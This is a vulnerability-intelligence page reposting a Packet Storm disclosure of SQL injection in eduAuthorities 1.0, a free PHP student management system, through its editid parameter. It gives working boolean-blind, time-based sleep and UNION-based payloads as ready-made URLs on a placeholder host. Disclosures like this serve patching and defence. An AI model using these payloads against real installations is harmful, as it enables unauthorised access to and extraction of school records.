Lucene search

K

eduAuthorities 1.0 SQL Injection

🗓️ 06 Aug 2024 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 108 Views

The eduAuthorities 1.0 software from mayurik.com is vulnerable to SQL injection attacks, allowing attackers to gain unauthorized access to the system and potentially extract sensitive information. The vulnerability was confirmed through different responses to specific payloads and a significant increase in response time. An example exploit URL is provided for further reference

Show more
Code
`## Titles: eduAuthorities-1.0 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 07/29/2024  
## Vendor: https://www.mayurik.com/  
## Software:  
https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The editid parameter appears to be vulnerable to SQL injection attacks. The  
payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each  
submitted in the editid parameter. These two requests resulted in different  
responses, indicating that the input is being incorporated into a SQL query  
in an unsafe way. Note that automated difference-based tests for SQL  
injection flaws can often be unreliable and are prone to false positive  
results. You should manually review the reported requests and responses to  
confirm whether a vulnerability is actually present.  
Additionally, the payload (select*from(select(sleep(20)))a) was submitted  
in the editid parameter. The application took 20011 milliseconds to respond  
to the request, compared with 3 milliseconds for the original request,  
indicating that the injected SQL command caused a time delay.The attacker  
can get all information from the system by using this vulnerability!  
  
STATUS: HIGH- Vulnerability  
  
  
[+]Exploits:  
- SQLi Multiple:  
```mysql  
---  
Parameter: #1* (URI)  
Type: boolean-based blind  
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP  
BY clause (EXTRACTVALUE)  
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488  
OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#  
UiVZfrom(select(sleep(3)))a)  
  
Type: UNION query  
Title: MySQL UNION query (random number) - 3 columns  
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962  
UNION ALL SELECT  
8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)  
---  
```  
  
## Reproduce:  
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)  
  
## More:  
[href](  
https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)  
  
## Time spent:  
00:37:00  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
06 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
108
.json
Report